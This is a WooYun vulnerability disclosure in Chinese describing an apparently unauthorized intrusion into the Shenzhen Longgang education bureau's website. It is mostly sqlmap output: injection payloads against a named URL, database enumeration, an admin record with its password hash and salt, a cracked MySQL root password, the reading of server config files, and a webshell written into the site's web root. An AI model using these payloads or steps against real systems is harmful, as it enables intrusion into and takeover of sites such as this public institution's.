当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125977

漏洞标题:渗透测试之深圳龙岗教育网

相关厂商:深圳市龙岗教育局

漏洞作者: 安全小飞侠

提交时间:2015-07-11 08:57

修复时间:2015-08-25 08:58

公开时间:2015-08-25 08:58

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-11: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-08-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

一个SQL注入引发的成功入侵内网事件...
请叫我安全小飞侠,谢谢!

详细说明:

最近写了个自动采集URL和扫描SQL注入的小脚本,想来看看有没有什么新发现。
于是,有了下面的故事...
某日下班回家,打开自己跑了几天脚本的服务器看看,心想改到收网的时候了。谁料结果并不如预期的那样,一条“大鱼”也没抓到,就在日志里发现了下面这个url:

http://www.szlg.edu.cn/hudong.php?id=3144


简单的手动测试了一下, 果然有SQL注入漏洞.

http://www.szlg.edu.cn/hudong.php?id=3144' or 1=1


sqli.jpg


于是乎,果断拿sqlmap跑一下,各种数据表尽现眼前,简单看了一下得有250+吧。而且还具有DBA的权限。

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: id=-7371 OR 6656=6656#
    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY cla
use
    Payload: id=1 OR (SELECT 2370 FROM(SELECT COUNT(*),CONCAT(0x71767a7071,(SELE
CT (ELT(2370=2370,1))),0x717a7a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.C
HARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))GkhW)
    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: id=1 UNION ALL SELECT CONCAT(0x71767a7071,0x71736979464a5a754149,0x
717a7a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
[17:24:18] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.15, Apache 2.4.10
back-end DBMS: MySQL 5.0
[17:24:18] [INFO] fetching database names
[17:24:18] [INFO] the SQL query used returns 9 entries
[17:24:18] [INFO] resumed: "information_schema"
[17:24:18] [INFO] resumed: "cdcol"
[17:24:18] [INFO] resumed: "empirecms"
[17:24:18] [INFO] resumed: "lgedusupervision"
[17:24:18] [INFO] resumed: "lgjys"
[17:24:18] [INFO] resumed: "mysql"
[17:24:18] [INFO] resumed: "performance_schema"
[17:24:18] [INFO] resumed: "phpmyadmin"
[17:24:18] [INFO] resumed: "test"
available databases [9]:
[*] cdcol
[*] empirecms
[*] information_schema
[*] lgedusupervision
[*] lgjys
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[17:25:21] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.15, Apache 2.4.10
back-end DBMS: MySQL 5.0
[17:25:21] [INFO] fetching current user
current user:    'root@localhost'
[17:25:21] [INFO] fetching current database
current database:    'empirecms'
[17:25:21] [INFO] testing if current user is DBA
[17:25:21] [INFO] fetching current user
current user is DBA:    True
[18:04:19] [INFO] cracked password 'root' for user 'root'
database management system users password hashes:
[*] pma [1]:
    password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
    clear-text password: root
[*] root [1]:
    password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
    clear-text password: root


这里的显示有点奇怪(看着显示的是数据库),实际上这些都是Empirecms数据库下的表。

tables.jpg


习惯性地看看有没有什么敏感信息可以看见。

Database: empirecms
Table: phome_enewsuser
[22 columns]
+------------+----------------------+
| Column     | Type                 |
+------------+----------------------+
| addip      | varchar(20)          |
| addtime    | int(10) unsigned     |
| adminclass | mediumtext           |
| checked    | tinyint(1)           |
| classid    | smallint(5) unsigned |
| email      | varchar(120)         |
| filelevel  | tinyint(1)           |
| groupid    | smallint(5) unsigned |
| lastip     | varchar(20)          |
| lasttime   | int(10) unsigned     |
| loginnum   | int(10) unsigned     |
| password   | varchar(32)          |
| preip      | varchar(20)          |
| pretime    | int(10) unsigned     |
| rnd        | varchar(20)          |
| salt       | varchar(8)           |
| styleid    | smallint(5) unsigned |
| truename   | varchar(20)          |
| userid     | int(10) unsigned     |
| username   | varchar(30)          |
| userorg    | mediumtext           |
| userprikey | varchar(50)          |
+------------+----------------------+
Database: empirecms
+-----------------+---------+
| Table           | Entries |
+-----------------+---------+
| phome_enewsuser | 32      |
+-----------------+---------+


看看有没有管理员密码什么的登录一下后台。

[17:34:32] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.15, Apache 2.4.10
back-end DBMS: MySQL 5.0
[17:34:32] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> select * from phome_enewsuser where userid=1
[17:35:11] [INFO] fetching SQL SELECT statement query output: 'select * from pho
me_enewsuser where userid=1'
[17:35:11] [INFO] you did not provide the fields in your query. sqlmap will retr
ieve the column names itself
[17:35:11] [WARNING] missing database parameter. sqlmap is going to use the curr
ent database to enumerate table(s) columns
[17:35:11] [INFO] fetching current database
[17:35:11] [INFO] fetching columns for table 'phome_enewsuser' in database 'empi
recms'
[17:35:11] [INFO] the SQL query used returns 22 entries
[17:35:11] [INFO] the query with expanded column name(s) is: SELECT addip, addti
me, adminclass, checked, classid, email, filelevel, groupid, lastip, lasttime, l
oginnum, password, preip, pretime, rnd, salt, styleid, truename, userid, usernam
e, userorg, userprikey FROM phome_enewsuser WHERE userid=1
[17:35:11] [INFO] the SQL query used returns 1 entries
[17:35:11] [INFO] retrieved: "127.0.0.1","1415617712","|","0","0","","0","1",...
select * from phome_enewsuser where userid=1 [1]:
[*] 127.0.0.1, 1415617712, |, 0, 0, , 0, 1, 125.218.66.122, 1436497771, 494, 504
07f6a9a8138749ac075b0decbb1d6, 125.218.66.122, 1436497708, GmAwTFUqjim8eCg28t7g,
 8vYLFas4, 1, , 1, lgadmin, , HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH


果然有,但是一看是加盐哈希存储的果断放弃了。。。于是乎,我在想既然破解不了密码,那我能不能通过insert增加一个管理员权限的账号呢。
想到就干,但这时我注意到一个细节就是这个数据库的名字Empirecms和所有数据表的前缀phome_enews****, 有没有似曾相识的感觉?那还等什么,百度一下呗。

epcms.jpg


看到没,就是它,“帝国网站管理系统”(好霸气的名字!!!)。看到这,不禁有点开心了,既然能知道源码和数据库结构那还不事半功倍了。 下载一个部署到虚机里部署一下,看看系统是怎么认证管理员的。在虚机里一番云雨,终于发现如下方法可以重置管理员密码。

admin.jpg


到这里,我似乎找到了印证我开始想法的办法了,那就是在虚机的系统上添加一个管理员账号,然后导出系统生成的salt,随机数,以及加密后的密码到这个系统上,我不就等于获得到了这个CMS系统管理员的权限了。于是,我兴高采烈地开始实验我的想法并开心地期待着成功的消息。

web application technology: PHP 5.5.15, Apache 2.4.10
back-end DBMS: MySQL 5.0
[17:34:32] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> select * from phome_enewsuser where userid=1
[17:35:11] [INFO] fetching SQL SELECT statement query output: 'select * from pho
me_enewsuser where userid=1'
[17:35:11] [INFO] you did not provide the fields in your query. sqlmap will retr
ieve the column names itself
[17:35:11] [WARNING] missing database parameter. sqlmap is going to use the curr
ent database to enumerate table(s) columns
[17:35:11] [INFO] fetching current database
[17:35:11] [INFO] fetching columns for table 'phome_enewsuser' in database 'empi
recms'
[17:35:11] [INFO] the SQL query used returns 22 entries
[17:35:11] [INFO] the query with expanded column name(s) is: SELECT addip, addti
me, adminclass, checked, classid, email, filelevel, groupid, lastip, lasttime, l
oginnum, password, preip, pretime, rnd, salt, styleid, truename, userid, usernam
e, userorg, userprikey FROM phome_enewsuser WHERE userid=1
[17:35:11] [INFO] the SQL query used returns 1 entries
[17:35:11] [INFO] retrieved: "127.0.0.1","1415617712","|","0","0","","0","1",...
select * from phome_enewsuser where userid=1 [1]:
[*] 127.0.0.1, 1415617712, |, 0, 0, , 0, 1, 125.218.66.122, 1436497771, 494, 504
07f6a9a8138749ac075b0decbb1d6, 125.218.66.122, 1436497708, GmAwTFUqjim8eCg28t7g,
 8vYLFas4, 1, , 1, lgadmin, , HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH
sql-shell> insert into phome_enewsuser (addip, addtime, adminclass, checked, cla
ssid, email, filelevel, groupid, lastip, lasttime, loginnum, password, preip, pr
etime,rnd, salt, styleid, truename, userid, username, userorg, userprikey) value
s ('127.0.0.1', '1415617712', '|', 0, 0, , 0, 1, '125.218.66.122','1436497771',
494, '50407f6a9a8138749ac075b0decbb1d6', '125.218.66.122', '1436497708, 'GmAwTFU
qjim8eCg28t7g','8vYLFas4', 1, '', 33, 'lgadmin', '', 'HHHHHHHHHHHHHHHHHHHHHHHHHH
HHHHHHHHHHHHHHHHHHHHHH')
[17:56:59] [WARNING] execution of custom SQL queries is only available when stacked queries are supported
sql-shell>


然而,失败了!查了一下资料才知道(大牛勿喷),原来在此处不支持insert和update语句。好吧,此路也走不通了,难道就只能到这了吗?突然想到前面好像出现了一个很熟悉的数据库phpmyadmin而且还有获得到root的密码,要不试试?

phpmyadmin.jpg


结果,再次失败了!前面获取到的账号和密码都无法登陆。怎么办呢?冷静下来,在分析分析,phpmyadmin+mysql+Apache+php,好熟悉的组合,难道是XAMPP部署的应用?
那就来测试一下吧,先获取一个/opt/lampp/etc/php.ini看看吧

[18:11:45] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.15, Apache 2.4.10
back-end DBMS: MySQL 5.0
[18:11:45] [INFO] fingerprinting the back-end DBMS operating system
[18:11:45] [INFO] the back-end DBMS operating system is Linux
[18:11:45] [INFO] fetching file: '/opt/lampp/etc/php.ini'
do you want confirmation that the remote file '/opt/lampp/etc/php.ini' has been
successfully downloaded from the back-end DBMS file system? [Y/n] Y
[18:11:48] [INFO] the local file C:\Users\hacker\.sqlmap\output\www.szlg.edu.cn\
files\_opt_lampp_etc_php.ini and the remote file /opt/lampp/etc/php.ini have the
 same size (69081b)
files saved to [1]:
[*] C:\Users\hacker\.sqlmap\output\www.szlg.edu.cn\files\_opt_lampp_etc_php.ini
(same file)


php.jpg


看来果然是XAMPP部署的应用,那就好办了,现在只要找到网站的绝对路径就可以直接上传一个webshell拿下它了。
顺利读取了/opt/lampp/etc/httpd.conf并找到了网站的绝对路径:/home/lgedu

[18:17:08] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.15, Apache 2.4.10
back-end DBMS: MySQL 5.0
[18:17:08] [INFO] fingerprinting the back-end DBMS operating system
[18:17:08] [INFO] the back-end DBMS operating system is Linux
[18:17:08] [INFO] fetching file: '/opt/lampp/etc/httpd.conf'
do you want confirmation that the remote file '/opt/lampp/etc/httpd.conf' has be
en successfully downloaded from the back-end DBMS file system? [Y/n] Y
[18:17:11] [INFO] the local file C:\Users\hacker\.sqlmap\output\www.szlg.edu.cn\
files\_opt_lampp_etc_httpd.conf and the remote file /opt/lampp/etc/httpd.conf ha
ve the same size (23342b)
files saved to [1]:
[*] C:\Users\hacker\.sqlmap\output\www.szlg.edu.cn\files\_opt_lampp_etc_httpd.co
nf (same file)


homepath.jpg


最后,上传一个webshell菜刀小连一下,网站终于被彻底拿下。

[18:21:33] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.15, Apache 2.4.10
back-end DBMS: MySQL 5.0
[18:21:33] [INFO] fingerprinting the back-end DBMS operating system
[18:21:33] [INFO] the back-end DBMS operating system is Linux
[18:21:34] [WARNING] reflective value(s) found and filtering out
[18:21:34] [WARNING] expect junk characters inside the file as a leftover from U
NION query
do you want confirmation that the local file 'C:/Users/hacker/Desktop/wy.php' ha
s been successfully written on the back-end DBMS file system (/home/lgedu/e/admi
n/view/key/wy.php)? [Y/n] Y
[18:21:39] [INFO] the remote file /home/lgedu/e/admin/view/key/wy.php is larger
(35b) than the local file C:/Users/hacker/Desktop/wy.php (28b)
[18:21:39] [INFO] fetched data logged to text files under 'C:\Users\hacker\.sqlm
ap\output\www.szlg.edu.cn'


webshell.jpg


完...

漏洞证明:

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: id=-7371 OR 6656=6656#
    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY cla
use
    Payload: id=1 OR (SELECT 2370 FROM(SELECT COUNT(*),CONCAT(0x71767a7071,(SELE
CT (ELT(2370=2370,1))),0x717a7a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.C
HARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))GkhW)
    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: id=1 UNION ALL SELECT CONCAT(0x71767a7071,0x71736979464a5a754149,0x
717a7a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
[17:24:18] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.15, Apache 2.4.10
back-end DBMS: MySQL 5.0
[17:24:18] [INFO] fetching database names
[17:24:18] [INFO] the SQL query used returns 9 entries
[17:24:18] [INFO] resumed: "information_schema"
[17:24:18] [INFO] resumed: "cdcol"
[17:24:18] [INFO] resumed: "empirecms"
[17:24:18] [INFO] resumed: "lgedusupervision"
[17:24:18] [INFO] resumed: "lgjys"
[17:24:18] [INFO] resumed: "mysql"
[17:24:18] [INFO] resumed: "performance_schema"
[17:24:18] [INFO] resumed: "phpmyadmin"
[17:24:18] [INFO] resumed: "test"
available databases [9]:
[*] cdcol
[*] empirecms
[*] information_schema
[*] lgedusupervision
[*] lgjys
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[17:25:21] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.15, Apache 2.4.10
back-end DBMS: MySQL 5.0
[17:25:21] [INFO] fetching current user
current user:    'root@localhost'
[17:25:21] [INFO] fetching current database
current database:    'empirecms'
[17:25:21] [INFO] testing if current user is DBA
[17:25:21] [INFO] fetching current user
current user is DBA:    True
[18:04:19] [INFO] cracked password 'root' for user 'root'
database management system users password hashes:
[*] pma [1]:
    password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
    clear-text password: root
[*] root [1]:
    password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
    clear-text password: root


[18:21:33] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.15, Apache 2.4.10
back-end DBMS: MySQL 5.0
[18:21:33] [INFO] fingerprinting the back-end DBMS operating system
[18:21:33] [INFO] the back-end DBMS operating system is Linux
[18:21:34] [WARNING] reflective value(s) found and filtering out
[18:21:34] [WARNING] expect junk characters inside the file as a leftover from U
NION query
do you want confirmation that the local file 'C:/Users/hacker/Desktop/wy.php' ha
s been successfully written on the back-end DBMS file system (/home/lgedu/e/admi
n/view/key/wy.php)? [Y/n] Y
[18:21:39] [INFO] the remote file /home/lgedu/e/admin/view/key/wy.php is larger
(35b) than the local file C:/Users/hacker/Desktop/wy.php (28b)
[18:21:39] [INFO] fetched data logged to text files under 'C:\Users\hacker\.sqlm
ap\output\www.szlg.edu.cn'


webshell.jpg


修复方案:

你们懂的!

版权声明:转载请注明来源 安全小飞侠@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝